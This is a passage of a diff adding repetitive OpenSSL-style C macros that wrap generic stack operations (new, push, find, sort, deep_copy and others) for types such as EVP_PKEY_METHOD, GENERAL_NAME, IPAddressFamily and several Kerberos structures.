+# define sk_EVP_PKEY_ASN1_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_METHOD, (cmp))
+# define sk_EVP_PKEY_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_METHOD)
+# define sk_EVP_PKEY_METHOD_free(st) SKM_sk_free(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_num(st) SKM_sk_num(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_METHOD, (st), (i))
+# define sk_EVP_PKEY_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_METHOD, (st), (i), (val))
+# define sk_EVP_PKEY_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_METHOD, (st), (val))
+# define sk_EVP_PKEY_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_METHOD, (st), (val))
+# define sk_EVP_PKEY_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_METHOD, (st), (val))
+# define sk_EVP_PKEY_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_METHOD, (st), (val))
+# define sk_EVP_PKEY_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_METHOD, (st), (i))
+# define sk_EVP_PKEY_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_METHOD, (st), (ptr))
+# define sk_EVP_PKEY_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_METHOD, (st), (val), (i))
+# define sk_EVP_PKEY_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_METHOD, (st), (cmp))
+# define sk_EVP_PKEY_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_METHOD, st)
+# define sk_EVP_PKEY_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_METHOD, (st), (free_func))
+# define sk_EVP_PKEY_METHOD_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(EVP_PKEY_METHOD, (st), (copy_func), (free_func))
+# define sk_EVP_PKEY_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_METHOD, (st))
+# define sk_EVP_PKEY_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_METHOD, (st))
+# define sk_GENERAL_NAME_new(cmp) SKM_sk_new(GENERAL_NAME, (cmp))
+# define sk_GENERAL_NAME_new_null() SKM_sk_new_null(GENERAL_NAME)
+# define sk_GENERAL_NAME_free(st) SKM_sk_free(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_num(st) SKM_sk_num(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_value(st, i) SKM_sk_value(GENERAL_NAME, (st), (i))
+# define sk_GENERAL_NAME_set(st, i, val) SKM_sk_set(GENERAL_NAME, (st), (i), (val))
+# define sk_GENERAL_NAME_zero(st) SKM_sk_zero(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_push(st, val) SKM_sk_push(GENERAL_NAME, (st), (val))
+# define sk_GENERAL_NAME_unshift(st, val) SKM_sk_unshift(GENERAL_NAME, (st), (val))
+# define sk_GENERAL_NAME_find(st, val) SKM_sk_find(GENERAL_NAME, (st), (val))
+# define sk_GENERAL_NAME_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAME, (st), (val))
+# define sk_GENERAL_NAME_delete(st, i) SKM_sk_delete(GENERAL_NAME, (st), (i))
+# define sk_GENERAL_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAME, (st), (ptr))
+# define sk_GENERAL_NAME_insert(st, val, i) SKM_sk_insert(GENERAL_NAME, (st), (val), (i))
+# define sk_GENERAL_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAME, (st), (cmp))
+# define sk_GENERAL_NAME_dup(st) SKM_sk_dup(GENERAL_NAME, st)
+# define sk_GENERAL_NAME_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAME, (st), (free_func))
+# define sk_GENERAL_NAME_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(GENERAL_NAME, (st), (copy_func), (free_func))
+# define sk_GENERAL_NAME_shift(st) SKM_sk_shift(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_pop(st) SKM_sk_pop(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_sort(st) SKM_sk_sort(GENERAL_NAME, (st))
+# define sk_GENERAL_NAME_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAME, (st))
+# define sk_GENERAL_NAMES_new(cmp) SKM_sk_new(GENERAL_NAMES, (cmp))
+# define sk_GENERAL_NAMES_new_null() SKM_sk_new_null(GENERAL_NAMES)
+# define sk_GENERAL_NAMES_free(st) SKM_sk_free(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_num(st) SKM_sk_num(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_value(st, i) SKM_sk_value(GENERAL_NAMES, (st), (i))
+# define sk_GENERAL_NAMES_set(st, i, val) SKM_sk_set(GENERAL_NAMES, (st), (i), (val))
+# define sk_GENERAL_NAMES_zero(st) SKM_sk_zero(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_push(st, val) SKM_sk_push(GENERAL_NAMES, (st), (val))
+# define sk_GENERAL_NAMES_unshift(st, val) SKM_sk_unshift(GENERAL_NAMES, (st), (val))
+# define sk_GENERAL_NAMES_find(st, val) SKM_sk_find(GENERAL_NAMES, (st), (val))
+# define sk_GENERAL_NAMES_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAMES, (st), (val))
+# define sk_GENERAL_NAMES_delete(st, i) SKM_sk_delete(GENERAL_NAMES, (st), (i))
+# define sk_GENERAL_NAMES_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAMES, (st), (ptr))
+# define sk_GENERAL_NAMES_insert(st, val, i) SKM_sk_insert(GENERAL_NAMES, (st), (val), (i))
+# define sk_GENERAL_NAMES_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAMES, (st), (cmp))
+# define sk_GENERAL_NAMES_dup(st) SKM_sk_dup(GENERAL_NAMES, st)
+# define sk_GENERAL_NAMES_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAMES, (st), (free_func))
+# define sk_GENERAL_NAMES_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(GENERAL_NAMES, (st), (copy_func), (free_func))
+# define sk_GENERAL_NAMES_shift(st) SKM_sk_shift(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_pop(st) SKM_sk_pop(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_sort(st) SKM_sk_sort(GENERAL_NAMES, (st))
+# define sk_GENERAL_NAMES_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAMES, (st))
+# define sk_GENERAL_SUBTREE_new(cmp) SKM_sk_new(GENERAL_SUBTREE, (cmp))
+# define sk_GENERAL_SUBTREE_new_null() SKM_sk_new_null(GENERAL_SUBTREE)
+# define sk_GENERAL_SUBTREE_free(st) SKM_sk_free(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_num(st) SKM_sk_num(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_value(st, i) SKM_sk_value(GENERAL_SUBTREE, (st), (i))
+# define sk_GENERAL_SUBTREE_set(st, i, val) SKM_sk_set(GENERAL_SUBTREE, (st), (i), (val))
+# define sk_GENERAL_SUBTREE_zero(st) SKM_sk_zero(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_push(st, val) SKM_sk_push(GENERAL_SUBTREE, (st), (val))
+# define sk_GENERAL_SUBTREE_unshift(st, val) SKM_sk_unshift(GENERAL_SUBTREE, (st), (val))
+# define sk_GENERAL_SUBTREE_find(st, val) SKM_sk_find(GENERAL_SUBTREE, (st), (val))
+# define sk_GENERAL_SUBTREE_find_ex(st, val) SKM_sk_find_ex(GENERAL_SUBTREE, (st), (val))
+# define sk_GENERAL_SUBTREE_delete(st, i) SKM_sk_delete(GENERAL_SUBTREE, (st), (i))
+# define sk_GENERAL_SUBTREE_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_SUBTREE, (st), (ptr))
+# define sk_GENERAL_SUBTREE_insert(st, val, i) SKM_sk_insert(GENERAL_SUBTREE, (st), (val), (i))
+# define sk_GENERAL_SUBTREE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_SUBTREE, (st), (cmp))
+# define sk_GENERAL_SUBTREE_dup(st) SKM_sk_dup(GENERAL_SUBTREE, st)
+# define sk_GENERAL_SUBTREE_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_SUBTREE, (st), (free_func))
+# define sk_GENERAL_SUBTREE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(GENERAL_SUBTREE, (st), (copy_func), (free_func))
+# define sk_GENERAL_SUBTREE_shift(st) SKM_sk_shift(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_pop(st) SKM_sk_pop(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_sort(st) SKM_sk_sort(GENERAL_SUBTREE, (st))
+# define sk_GENERAL_SUBTREE_is_sorted(st) SKM_sk_is_sorted(GENERAL_SUBTREE, (st))
+# define sk_IPAddressFamily_new(cmp) SKM_sk_new(IPAddressFamily, (cmp))
+# define sk_IPAddressFamily_new_null() SKM_sk_new_null(IPAddressFamily)
+# define sk_IPAddressFamily_free(st) SKM_sk_free(IPAddressFamily, (st))
+# define sk_IPAddressFamily_num(st) SKM_sk_num(IPAddressFamily, (st))
+# define sk_IPAddressFamily_value(st, i) SKM_sk_value(IPAddressFamily, (st), (i))
+# define sk_IPAddressFamily_set(st, i, val) SKM_sk_set(IPAddressFamily, (st), (i), (val))
+# define sk_IPAddressFamily_zero(st) SKM_sk_zero(IPAddressFamily, (st))
+# define sk_IPAddressFamily_push(st, val) SKM_sk_push(IPAddressFamily, (st), (val))
+# define sk_IPAddressFamily_unshift(st, val) SKM_sk_unshift(IPAddressFamily, (st), (val))
+# define sk_IPAddressFamily_find(st, val) SKM_sk_find(IPAddressFamily, (st), (val))
+# define sk_IPAddressFamily_find_ex(st, val) SKM_sk_find_ex(IPAddressFamily, (st), (val))
+# define sk_IPAddressFamily_delete(st, i) SKM_sk_delete(IPAddressFamily, (st), (i))
+# define sk_IPAddressFamily_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressFamily, (st), (ptr))
+# define sk_IPAddressFamily_insert(st, val, i) SKM_sk_insert(IPAddressFamily, (st), (val), (i))
+# define sk_IPAddressFamily_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressFamily, (st), (cmp))
+# define sk_IPAddressFamily_dup(st) SKM_sk_dup(IPAddressFamily, st)
+# define sk_IPAddressFamily_pop_free(st, free_func) SKM_sk_pop_free(IPAddressFamily, (st), (free_func))
+# define sk_IPAddressFamily_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(IPAddressFamily, (st), (copy_func), (free_func))
+# define sk_IPAddressFamily_shift(st) SKM_sk_shift(IPAddressFamily, (st))
+# define sk_IPAddressFamily_pop(st) SKM_sk_pop(IPAddressFamily, (st))
+# define sk_IPAddressFamily_sort(st) SKM_sk_sort(IPAddressFamily, (st))
+# define sk_IPAddressFamily_is_sorted(st) SKM_sk_is_sorted(IPAddressFamily, (st))
+# define sk_IPAddressOrRange_new(cmp) SKM_sk_new(IPAddressOrRange, (cmp))
+# define sk_IPAddressOrRange_new_null() SKM_sk_new_null(IPAddressOrRange)
+# define sk_IPAddressOrRange_free(st) SKM_sk_free(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_num(st) SKM_sk_num(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_value(st, i) SKM_sk_value(IPAddressOrRange, (st), (i))
+# define sk_IPAddressOrRange_set(st, i, val) SKM_sk_set(IPAddressOrRange, (st), (i), (val))
+# define sk_IPAddressOrRange_zero(st) SKM_sk_zero(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_push(st, val) SKM_sk_push(IPAddressOrRange, (st), (val))
+# define sk_IPAddressOrRange_unshift(st, val) SKM_sk_unshift(IPAddressOrRange, (st), (val))
+# define sk_IPAddressOrRange_find(st, val) SKM_sk_find(IPAddressOrRange, (st), (val))
+# define sk_IPAddressOrRange_find_ex(st, val) SKM_sk_find_ex(IPAddressOrRange, (st), (val))
+# define sk_IPAddressOrRange_delete(st, i) SKM_sk_delete(IPAddressOrRange, (st), (i))
+# define sk_IPAddressOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressOrRange, (st), (ptr))
+# define sk_IPAddressOrRange_insert(st, val, i) SKM_sk_insert(IPAddressOrRange, (st), (val), (i))
+# define sk_IPAddressOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressOrRange, (st), (cmp))
+# define sk_IPAddressOrRange_dup(st) SKM_sk_dup(IPAddressOrRange, st)
+# define sk_IPAddressOrRange_pop_free(st, free_func) SKM_sk_pop_free(IPAddressOrRange, (st), (free_func))
+# define sk_IPAddressOrRange_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(IPAddressOrRange, (st), (copy_func), (free_func))
+# define sk_IPAddressOrRange_shift(st) SKM_sk_shift(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_pop(st) SKM_sk_pop(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_sort(st) SKM_sk_sort(IPAddressOrRange, (st))
+# define sk_IPAddressOrRange_is_sorted(st) SKM_sk_is_sorted(IPAddressOrRange, (st))
+# define sk_KRB5_APREQBODY_new(cmp) SKM_sk_new(KRB5_APREQBODY, (cmp))
+# define sk_KRB5_APREQBODY_new_null() SKM_sk_new_null(KRB5_APREQBODY)
+# define sk_KRB5_APREQBODY_free(st) SKM_sk_free(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_num(st) SKM_sk_num(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_value(st, i) SKM_sk_value(KRB5_APREQBODY, (st), (i))
+# define sk_KRB5_APREQBODY_set(st, i, val) SKM_sk_set(KRB5_APREQBODY, (st), (i), (val))
+# define sk_KRB5_APREQBODY_zero(st) SKM_sk_zero(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_push(st, val) SKM_sk_push(KRB5_APREQBODY, (st), (val))
+# define sk_KRB5_APREQBODY_unshift(st, val) SKM_sk_unshift(KRB5_APREQBODY, (st), (val))
+# define sk_KRB5_APREQBODY_find(st, val) SKM_sk_find(KRB5_APREQBODY, (st), (val))
+# define sk_KRB5_APREQBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_APREQBODY, (st), (val))
+# define sk_KRB5_APREQBODY_delete(st, i) SKM_sk_delete(KRB5_APREQBODY, (st), (i))
+# define sk_KRB5_APREQBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_APREQBODY, (st), (ptr))
+# define sk_KRB5_APREQBODY_insert(st, val, i) SKM_sk_insert(KRB5_APREQBODY, (st), (val), (i))
+# define sk_KRB5_APREQBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_APREQBODY, (st), (cmp))
+# define sk_KRB5_APREQBODY_dup(st) SKM_sk_dup(KRB5_APREQBODY, st)
+# define sk_KRB5_APREQBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_APREQBODY, (st), (free_func))
+# define sk_KRB5_APREQBODY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_APREQBODY, (st), (copy_func), (free_func))
+# define sk_KRB5_APREQBODY_shift(st) SKM_sk_shift(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_pop(st) SKM_sk_pop(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_sort(st) SKM_sk_sort(KRB5_APREQBODY, (st))
+# define sk_KRB5_APREQBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_APREQBODY, (st))
+# define sk_KRB5_AUTHDATA_new(cmp) SKM_sk_new(KRB5_AUTHDATA, (cmp))
+# define sk_KRB5_AUTHDATA_new_null() SKM_sk_new_null(KRB5_AUTHDATA)
+# define sk_KRB5_AUTHDATA_free(st) SKM_sk_free(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_num(st) SKM_sk_num(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_value(st, i) SKM_sk_value(KRB5_AUTHDATA, (st), (i))
+# define sk_KRB5_AUTHDATA_set(st, i, val) SKM_sk_set(KRB5_AUTHDATA, (st), (i), (val))
+# define sk_KRB5_AUTHDATA_zero(st) SKM_sk_zero(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_push(st, val) SKM_sk_push(KRB5_AUTHDATA, (st), (val))
+# define sk_KRB5_AUTHDATA_unshift(st, val) SKM_sk_unshift(KRB5_AUTHDATA, (st), (val))
+# define sk_KRB5_AUTHDATA_find(st, val) SKM_sk_find(KRB5_AUTHDATA, (st), (val))
+# define sk_KRB5_AUTHDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHDATA, (st), (val))
+# define sk_KRB5_AUTHDATA_delete(st, i) SKM_sk_delete(KRB5_AUTHDATA, (st), (i))
+# define sk_KRB5_AUTHDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHDATA, (st), (ptr))
+# define sk_KRB5_AUTHDATA_insert(st, val, i) SKM_sk_insert(KRB5_AUTHDATA, (st), (val), (i))
+# define sk_KRB5_AUTHDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHDATA, (st), (cmp))
+# define sk_KRB5_AUTHDATA_dup(st) SKM_sk_dup(KRB5_AUTHDATA, st)
+# define sk_KRB5_AUTHDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHDATA, (st), (free_func))
+# define sk_KRB5_AUTHDATA_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_AUTHDATA, (st), (copy_func), (free_func))
+# define sk_KRB5_AUTHDATA_shift(st) SKM_sk_shift(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_pop(st) SKM_sk_pop(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_sort(st) SKM_sk_sort(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHDATA, (st))
+# define sk_KRB5_AUTHENTBODY_new(cmp) SKM_sk_new(KRB5_AUTHENTBODY, (cmp))
+# define sk_KRB5_AUTHENTBODY_new_null() SKM_sk_new_null(KRB5_AUTHENTBODY)
+# define sk_KRB5_AUTHENTBODY_free(st) SKM_sk_free(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_num(st) SKM_sk_num(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_value(st, i) SKM_sk_value(KRB5_AUTHENTBODY, (st), (i))
+# define sk_KRB5_AUTHENTBODY_set(st, i, val) SKM_sk_set(KRB5_AUTHENTBODY, (st), (i), (val))
+# define sk_KRB5_AUTHENTBODY_zero(st) SKM_sk_zero(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_push(st, val) SKM_sk_push(KRB5_AUTHENTBODY, (st), (val))
+# define sk_KRB5_AUTHENTBODY_unshift(st, val) SKM_sk_unshift(KRB5_AUTHENTBODY, (st), (val))
+# define sk_KRB5_AUTHENTBODY_find(st, val) SKM_sk_find(KRB5_AUTHENTBODY, (st), (val))
+# define sk_KRB5_AUTHENTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHENTBODY, (st), (val))
+# define sk_KRB5_AUTHENTBODY_delete(st, i) SKM_sk_delete(KRB5_AUTHENTBODY, (st), (i))
+# define sk_KRB5_AUTHENTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHENTBODY, (st), (ptr))
+# define sk_KRB5_AUTHENTBODY_insert(st, val, i) SKM_sk_insert(KRB5_AUTHENTBODY, (st), (val), (i))
+# define sk_KRB5_AUTHENTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHENTBODY, (st), (cmp))
+# define sk_KRB5_AUTHENTBODY_dup(st) SKM_sk_dup(KRB5_AUTHENTBODY, st)
+# define sk_KRB5_AUTHENTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHENTBODY, (st), (free_func))
+# define sk_KRB5_AUTHENTBODY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_AUTHENTBODY, (st), (copy_func), (free_func))
+# define sk_KRB5_AUTHENTBODY_shift(st) SKM_sk_shift(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_pop(st) SKM_sk_pop(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_sort(st) SKM_sk_sort(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_AUTHENTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHENTBODY, (st))
+# define sk_KRB5_CHECKSUM_new(cmp) SKM_sk_new(KRB5_CHECKSUM, (cmp))
+# define sk_KRB5_CHECKSUM_new_null() SKM_sk_new_null(KRB5_CHECKSUM)
+# define sk_KRB5_CHECKSUM_free(st) SKM_sk_free(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_num(st) SKM_sk_num(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_value(st, i) SKM_sk_value(KRB5_CHECKSUM, (st), (i))
+# define sk_KRB5_CHECKSUM_set(st, i, val) SKM_sk_set(KRB5_CHECKSUM, (st), (i), (val))
+# define sk_KRB5_CHECKSUM_zero(st) SKM_sk_zero(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_push(st, val) SKM_sk_push(KRB5_CHECKSUM, (st), (val))
+# define sk_KRB5_CHECKSUM_unshift(st, val) SKM_sk_unshift(KRB5_CHECKSUM, (st), (val))
+# define sk_KRB5_CHECKSUM_find(st, val) SKM_sk_find(KRB5_CHECKSUM, (st), (val))
+# define sk_KRB5_CHECKSUM_find_ex(st, val) SKM_sk_find_ex(KRB5_CHECKSUM, (st), (val))
+# define sk_KRB5_CHECKSUM_delete(st, i) SKM_sk_delete(KRB5_CHECKSUM, (st), (i))
+# define sk_KRB5_CHECKSUM_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_CHECKSUM, (st), (ptr))
+# define sk_KRB5_CHECKSUM_insert(st, val, i) SKM_sk_insert(KRB5_CHECKSUM, (st), (val), (i))
+# define sk_KRB5_CHECKSUM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_CHECKSUM, (st), (cmp))
+# define sk_KRB5_CHECKSUM_dup(st) SKM_sk_dup(KRB5_CHECKSUM, st)
+# define sk_KRB5_CHECKSUM_pop_free(st, free_func) SKM_sk_pop_free(KRB5_CHECKSUM, (st), (free_func))
+# define sk_KRB5_CHECKSUM_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_CHECKSUM, (st), (copy_func), (free_func))
+# define sk_KRB5_CHECKSUM_shift(st) SKM_sk_shift(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_pop(st) SKM_sk_pop(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_sort(st) SKM_sk_sort(KRB5_CHECKSUM, (st))
+# define sk_KRB5_CHECKSUM_is_sorted(st) SKM_sk_is_sorted(KRB5_CHECKSUM, (st))
+# define sk_KRB5_ENCDATA_new(cmp) SKM_sk_new(KRB5_ENCDATA, (cmp))
+# define sk_KRB5_ENCDATA_new_null() SKM_sk_new_null(KRB5_ENCDATA)
+# define sk_KRB5_ENCDATA_free(st) SKM_sk_free(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_num(st) SKM_sk_num(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_value(st, i) SKM_sk_value(KRB5_ENCDATA, (st), (i))
+# define sk_KRB5_ENCDATA_set(st, i, val) SKM_sk_set(KRB5_ENCDATA, (st), (i), (val))
+# define sk_KRB5_ENCDATA_zero(st) SKM_sk_zero(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_push(st, val) SKM_sk_push(KRB5_ENCDATA, (st), (val))
+# define sk_KRB5_ENCDATA_unshift(st, val) SKM_sk_unshift(KRB5_ENCDATA, (st), (val))
+# define sk_KRB5_ENCDATA_find(st, val) SKM_sk_find(KRB5_ENCDATA, (st), (val))
+# define sk_KRB5_ENCDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCDATA, (st), (val))
+# define sk_KRB5_ENCDATA_delete(st, i) SKM_sk_delete(KRB5_ENCDATA, (st), (i))
+# define sk_KRB5_ENCDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCDATA, (st), (ptr))
+# define sk_KRB5_ENCDATA_insert(st, val, i) SKM_sk_insert(KRB5_ENCDATA, (st), (val), (i))
+# define sk_KRB5_ENCDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCDATA, (st), (cmp))
+# define sk_KRB5_ENCDATA_dup(st) SKM_sk_dup(KRB5_ENCDATA, st)
+# define sk_KRB5_ENCDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCDATA, (st), (free_func))
+# define sk_KRB5_ENCDATA_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_ENCDATA, (st), (copy_func), (free_func))
+# define sk_KRB5_ENCDATA_shift(st) SKM_sk_shift(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_pop(st) SKM_sk_pop(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_sort(st) SKM_sk_sort(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCDATA, (st))
+# define sk_KRB5_ENCKEY_new(cmp) SKM_sk_new(KRB5_ENCKEY, (cmp))
+# define sk_KRB5_ENCKEY_new_null() SKM_sk_new_null(KRB5_ENCKEY)
+# define sk_KRB5_ENCKEY_free(st) SKM_sk_free(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_num(st) SKM_sk_num(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_value(st, i) SKM_sk_value(KRB5_ENCKEY, (st), (i))
+# define sk_KRB5_ENCKEY_set(st, i, val) SKM_sk_set(KRB5_ENCKEY, (st), (i), (val))
+# define sk_KRB5_ENCKEY_zero(st) SKM_sk_zero(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_push(st, val) SKM_sk_push(KRB5_ENCKEY, (st), (val))
+# define sk_KRB5_ENCKEY_unshift(st, val) SKM_sk_unshift(KRB5_ENCKEY, (st), (val))
+# define sk_KRB5_ENCKEY_find(st, val) SKM_sk_find(KRB5_ENCKEY, (st), (val))
+# define sk_KRB5_ENCKEY_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCKEY, (st), (val))
+# define sk_KRB5_ENCKEY_delete(st, i) SKM_sk_delete(KRB5_ENCKEY, (st), (i))
+# define sk_KRB5_ENCKEY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCKEY, (st), (ptr))
+# define sk_KRB5_ENCKEY_insert(st, val, i) SKM_sk_insert(KRB5_ENCKEY, (st), (val), (i))
+# define sk_KRB5_ENCKEY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCKEY, (st), (cmp))
+# define sk_KRB5_ENCKEY_dup(st) SKM_sk_dup(KRB5_ENCKEY, st)
+# define sk_KRB5_ENCKEY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCKEY, (st), (free_func))
+# define sk_KRB5_ENCKEY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(KRB5_ENCKEY, (st), (copy_func), (free_func))
+# define sk_KRB5_ENCKEY_shift(st) SKM_sk_shift(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_pop(st) SKM_sk_pop(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_sort(st) SKM_sk_sort(KRB5_ENCKEY, (st))
+# define sk_KRB5_ENCKEY_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCKEY, (st))
+# define sk_KRB5_PRINCNAME_new(cmp) SKM_sk_new(KRB5_PRINCNAME, (cmp))
+# define sk_KRB5_PRINCNAME_new_null() SKM_sk_new_null(KRB5_PRINCNAME)
+# define sk_KRB5_PRINCNAME_free(st) SKM_sk_free(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_num(st) SKM_sk_num(KRB5_PRINCNAME, (st))
+# define sk_KRB5_PRINCNAME_value(st, i) SKM_sk_value(KRB5_PRINCNAME, (st), (i))
+# define sk_KRB5_PRINCNAME_set(st, i, val) SKM_sk_set(KRB5_PRINCNAME, (st), (i), (val))
